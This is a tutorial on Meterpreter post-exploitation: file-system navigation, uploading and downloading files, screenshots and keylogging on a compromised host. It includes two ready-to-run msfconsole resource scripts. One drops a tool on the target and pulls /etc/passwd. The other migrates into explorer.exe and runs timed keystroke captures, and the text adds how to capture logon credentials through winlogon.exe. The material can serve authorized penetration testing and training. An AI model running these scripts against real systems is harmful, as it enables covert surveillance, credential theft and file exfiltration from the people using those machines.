After gaining remote control of the target machine through a trojan or an exploited vulnerability, the next step is post-exploitation. Meterpreter can be regarded as an advanced, multi-platform backdoor: it supports privilege escalation, information gathering, system monitoring, pivoting (using the compromised host as a springboard) and internal-network expansion, among other features.
1. Access the file system
The common file-system commands are listed below. Unless the name starts with l, a command acts on the target machine; the l-prefixed variants (lcd, lls, lpwd, getlwd) do the same thing on the attacker machine. The names and behaviour otherwise closely mirror the equivalent Linux commands.
cat | print the contents of a file on the target
cd | change the working directory on the target
cp | copy a file on the target (both paths are on the target; use upload to bring a file from the attacker machine)
mv | move or rename a file on the target
chmod | change the permissions of a file on the target (e.g. chmod 777 shell.elf; 755 is enough to make it executable without leaving it world-writable); Linux/Unix targets only
del / rm | delete a file on the target
dir / ls | list a directory on the target
mkdir | create a directory on the target
rmdir | delete a directory on the target
edit | edit a file on the target (Meterpreter pulls it to the attacker machine, opens it in the local editor and writes it back on save)
getlwd | print the attacker's local working directory (where am I on the attacker side?)
getwd | print the working directory on the target
lcd | change the attacker's local working directory
lls | list the attacker's local working directory
lpwd | print the attacker's local working directory (same as getlwd)
pwd | print the working directory on the target (same as getwd)
search | search for files on the target by name pattern and directory; search -h lists the options
2. Upload and download files
First cd into the target directory where the file should land, then use lcd (and lls) to move to the directory on the attacker machine that holds the file, and finally run upload <local file> [<target path>]; with no target path the file goes into the target's current working directory. Downloading works the same way in the other direction: download <target file> [<local path>], which defaults to the attacker's current local directory.
Step 1: run ls to confirm that the target's current directory is the one the file should be placed in.
Step 2: use lls and lcd to locate the file on the attacker side, then upload it.
Step 3: run ls again to confirm that the file is now present on the target.
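The same procedure driven from an msfconsole resource script, as an added example that is not part of the original post: it walks the file-system commands from section 1 and the upload/download steps above against an existing session. The file name post_fs.rc, the session id 1, the Linux target, the tool /root/tools/linpeas.sh and the attacker-side directory /root/loot are assumptions; sessions -C runs a single Meterpreter command on the session given with -i, and both cd (target) and lcd (attacker) persist between invocations.

```text
# post_fs.rc (hypothetical name): upload a tool, verify it, pull a file back.
# Run after a session exists:  msfconsole -q -r post_fs.rc
# Assumptions: session 1 is a Linux Meterpreter, /tmp on the target is writable,
# the attacker machine has /root/tools/linpeas.sh and an empty /root/loot directory.

# where on the target are we, and move to a directory we can write to
sessions -C "pwd" -i 1
sessions -C "cd /tmp" -i 1
sessions -C "getwd" -i 1

# attacker side: go to the directory holding the file to upload
sessions -C "lcd /root/tools" -i 1
sessions -C "lls" -i 1

# no destination given, so the file lands in the target's current directory (/tmp)
sessions -C "upload linpeas.sh" -i 1

# 755 is enough to run it; 777 would let any local user overwrite our tool
sessions -C "chmod 755 /tmp/linpeas.sh" -i 1

# verify it arrived with the expected permissions
sessions -C "ls /tmp" -i 1

# reverse direction: target -> attacker (explicit local path, not just a directory)
sessions -C "download /etc/passwd /root/loot/passwd" -i 1
sessions -C "lls /root/loot" -i 1

# clean up the dropped tool once it is no longer needed
sessions -C "rm /tmp/linpeas.sh" -i 1
sessions -C "ls /tmp" -i 1
```

Keeping upload, chmod and a follow-up ls together in one script makes the verification step habitual: a silent upload failure (wrong cwd, read-only filesystem, AV deleting the file) is caught before anything depends on the file being there.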
3. Screenshots
screenshot | capture the target's current desktop; the image is saved as a JPEG on the attacker machine and its path is printed (-p <path> sets the output file). Only the desktop of the process Meterpreter is running in is visible, so a session started from a service or another login session may need to migrate into a process on the user's desktop (e.g. explorer.exe) first.
4. Keylogging
keyscan_start | start the keylogger (Windows)
keyscan_dump | print the captured keystrokes (Windows)
keyscan_stop | stop the keylogger (Windows)
keyscan_start begins capturing keystrokes on the target, keyscan_dump prints what has been captured so far, and keyscan_stop ends the capture. As with screenshot, only keystrokes delivered to the desktop of the process Meterpreter lives in are seen: migrate into the logged-on user's explorer.exe to capture what they type, or (as SYSTEM) into winlogon.exe to capture logon credentials.
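The screenshot and keylogging commands from sections 3 and 4 combined into one resource script, as an added example that is not part of the original post. The file name post_ui.rc, the session id 2, the output path /root/loot/desktop.jpg and the 120-second capture windows are assumptions; migrate -N moves into the first process with the given executable name, and sleep is the msfconsole command that pauses the script.

```text
# post_ui.rc (hypothetical name): screenshot plus a timed keystroke capture.
# Run after a session exists:  msfconsole -q -r post_ui.rc
# Assumptions: session 2 is a Windows Meterpreter running as the logged-on user,
# and /root/loot exists on the attacker machine.

# screenshot and keyscan only see the desktop of the process we are in;
# move into the user's shell process before touching the UI
sessions -C "getpid" -i 2
sessions -C "migrate -N explorer.exe" -i 2
sessions -C "getpid" -i 2

# grab the desktop once so we know which application the user is working in
sessions -C "screenshot -p /root/loot/desktop.jpg" -i 2

# start capturing, give the user time to type, then read what was captured
sessions -C "keyscan_start" -i 2
sleep 120
sessions -C "keyscan_dump" -i 2

# a second window, dumped again before stopping so nothing typed in between is lost
sleep 120
sessions -C "keyscan_dump" -i 2
sessions -C "keyscan_stop" -i 2
```

The two getpid calls before and after migrate are the cheap check that the migration actually happened; if it failed (for example because explorer.exe runs as a different user), keyscan_start will still succeed but will never see the user's keystrokes.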